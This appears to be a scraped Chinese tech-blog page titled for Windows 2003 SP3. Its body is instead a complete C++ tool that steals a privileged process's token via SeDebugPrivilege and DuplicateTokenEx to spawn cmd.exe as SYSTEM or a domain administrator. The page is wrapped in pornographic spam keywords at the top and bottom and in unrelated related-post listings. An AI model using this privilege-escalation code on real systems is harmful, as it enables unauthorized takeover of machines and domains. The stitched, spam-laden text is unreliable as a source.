欧美第十页,AA视频aa,肏比视频网站,老鸭窝在线观看免费视频

windows 2003 sp3

九賢生活小編 ? ? 電腦百科

前沿拓展:

windows 2003 sp

sp=ServicePack,服務(wù)包的意思,其實就是補丁的**,一次安裝,之前的 那些系統(tǒng)補丁

SYSTEM->本機上其他用戶(包括域用戶)(好家伙,只要本機有system權(quán)限,域管敢在本機上創(chuàng)建進程就直接能拿到域管權(quán)限) 或者admin獲取debug權(quán)限后去獲取SYSTEM權(quán)限(這里有一個細節(jié)點,只有owner為administrator的SYSTEM進程才能被利用,比如lsass,dllhost)

技術(shù)細節(jié):通過尋找高權(quán)限開啟的進程,再**其令牌用以創(chuàng)建新進程,即可達到提權(quán)目的

#include <iostream>
#include <Windows.h>

//Only administrator can get debug priv
BOOL GetDebugPriv() {
HANDLE Token;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
return false;
}

tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Luid)) {
std::cout << "LookupPrivilegeValue ERROR" << GetLastError() << std::endl;
return false;
}
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(Token, FALSE, &tp, sizeof(tp), NULL, NULL) ){
std::cout << "AdjustTokenPrivileges ERROR" << GetLastError() << std::endl;
return false;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
return false;
}
else {
return true;
}
}

int main(int argc, char* argv[]) {
HANDLE t_process;
HANDLE token = NULL;
HANDLE token_bak = NULL;
DWORD process_id;
sscanf_s(argv[1], "%ul", &process_id);
WCHAR command[] = L"C:\Windows\System32\cmd.exe";
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
std::cout << argv[1] << std::endl;
std::cout << "Openning process PID:" << process_id << std::endl;
if (GetDebugPriv()== TRUE) {
std::cout << "Got the debug priv" << std::endl;
}
else {
std::cout << "GetDebugPriv ERROR" << std::endl;
}
system("whoami /priv");
t_process = OpenProcess(PROCESS_ALL_ACCESS, true, process_id);
if (!t_process) {
std::cout << "OpenProcess ERROR" << GetLastError() << std::endl;
}
if (!OpenProcessToken(t_process, TOKEN_ALL_ACCESS, &token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
}

if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &token_bak)) {
std::cout << "DuplicateTokenEx ERROR" << GetLastError() << std::endl;
}
if (!CreateProcessWithTokenW(token_bak, LOGON_WITH_PROFILE, NULL, command, 0, NULL, NULL, &startupInfo, &processInformation)) {
std::cout << "CreateProcessWithTokenW ERROR" << GetLastError() << std::endl;
}
return 0;
}
windows 2003 sp3

這是在win7下的測試結(jié)果 constadministrator 是域控

windows 2003 sp3

拓展知識:

原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http://cxzzxj.cn/5422.html

(0)
上一篇 2023年 2月 4日 am9:03
下一篇 2023年 2月 4日 am9:09

相關(guān)推薦

  • i76700主板(i76700滿載功耗)

    介紹i7 6700主板 i7 6700主板是一款性能強大的電腦主板,它由英特爾公司發(fā)布,是第六代Intel Core處理器的代表作品,也被稱為Skylake平臺。它的主頻為3.4G…

    電腦百科 2023年 5月 24日

  • amd4核740能帶750ti顯卡嗎

    amd4核740能帶750ti顯卡嗎 老鐵們好啊,今天小編給大家分享下我們在使用電腦過程中會遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 2500左右游…

    2023年 8月 26日

  • 聯(lián)想筆記本型號大全表(聯(lián)想筆記本型號及年份對照表)

    怎么查看聯(lián)想電腦屬于哪個系列? 聯(lián)想電腦能看到think的型號的方法步驟 查看聯(lián)想筆記本電腦型號,有如下2種方法: 方法一:通過外殼查看。 1)查看筆記本電腦的外殼型號標示; 2)…

    電腦百科 2023年 7月 29日

  • 筆記本中關(guān)村(筆記本中關(guān)村高級搜索)

    筆記本中關(guān)村(筆記本中關(guān)村高級搜索) 老鐵們好啊,今天小編給大家分享下我們在使用電腦和筆記本電腦過程中會遇到的一些問題故障該如何處理,電腦使用的一些小技巧等內(nèi)容 筆記本顯卡天梯圖2…

    2023年 8月 9日

  • 逃學(xué)大亂斗3.4最終版隱藏英雄密碼(逃學(xué)大亂斗3.4正式版隱藏英雄)

    前沿拓展: 逃學(xué)大亂斗3.4最終版隱藏英雄 200級以后三位到6000之后去趙朝下面那個問號商店換,選第一個,維護世界和平的神奇。 方法一:做任務(wù)。先殺李軍科,拿鑰匙趙朝,他會給你…

    電腦百科 2023年 2月 16日

  • 2016六月顯卡天梯圖(顯卡天梯圖2023)

    2016六月顯卡天梯圖(顯卡天梯圖2023) 老鐵們好啊,今天小編給大家分享下我們在使用電腦過程中會遇到的一些問題故障該如何處理,熱門電腦游戲需求配置,電腦使用的一些小技巧 201…

    2023年 8月 23日

  • 聯(lián)想個人云存儲x1:聯(lián)想個人云存儲X1(無盤版)參數(shù)

    1、5100mAh電池+68W快充頭,小巧身材海量存儲,2560x+256版3370元。 2、 ,共有三擋鎖定,延續(xù)了上一代產(chǎn)品的易用屬性,聯(lián)想拯救者Y70與小新PadPro202…

    電腦百科 2023年 10月 9日

  • win10非vol,Win10非vol的解釋與說明

    什么是Win10非vol? Win10非vol指的是不屬于微軟官方銷售的Windows10版本,也就是非零售版或者非OEM版。它們往往是由第三方渠道提供的,或者是通過其他途徑獲取的…

    電腦百科 2023年 3月 14日

  • secondary logon-戰(zhàn)網(wǎng)怎么重裝

    本文目錄1、戰(zhàn)網(wǎng)怎么重裝?2、secondscreen中文免root版?3、提示windows無法啟動secondary logon服務(wù)位于本地計算機上,錯誤1054無法創(chuàng)建線程?4、打開星際爭霸2一直是正在初始化怎么辦?5、win10 服務(wù)項未啟動?1、戰(zhàn)網(wǎng)怎么重裝?暴雪戰(zhàn)網(wǎng)無法安裝解決方法:1、首先保證你的已經(jīng)開啟了secondary logon服務(wù)。2、隨后將Adobe flash play

    電腦百科 2022年 11月 18日

  • internet explorer 8官方下載

    前沿拓展: 27 年后,微軟終于告別了網(wǎng)絡(luò)瀏覽器 Internet Explorer,并將 Explorer 用戶重定向到其最新版本的 Edge 瀏覽器。 截至 6 月 15 日,…

    2023年 2月 6日
额济纳旗| 小13箩利洗澡无码自慰网站| 日本精品三级久久| 午夜鲁鲁| 久久婷婷国产综合| 俄罗斯性欧美视频在线| 99亚洲欧美| 蜜臀亚洲网| 免费一级片子| 日韩极品高清在线视频观看 | 久久国产线观看免费网站| 深田一区二区无码| 麻豆天美內射| 国产av一区二区精品久久| 成人熟女视频一区二区三区| 色天使色婷婷丁香久久综合| 久久亚洲精品毛片| 日本久久电影视频看看| 多人一级黄片| 一区二区五区日韩国产欧美| 精品日韩欧美| Www.色网址| 伊人久久亚洲综合影院首页| 国产午夜无码视频观看网站| 欧美日韩黄片一区| 免费爆操网站| 日本一区二区在免费观看喷水| 武邑县| 国产黑丝在线精品| A一级一黄一片| 欧美性受视频一区二区三区四区| 深夜在线看免费男人| 色五月,五月丁香| 亚洲中文aⅴ中文字幕| 久久国产精品一区二区三区香蕉 | com四虎| 婷婷九月无码婷婷| 亚洲精品中文字幕乱码三区一二| 久久99精品久久久久久蜜芽| 偷拍911精品一区二区三区| 久久毛片国产|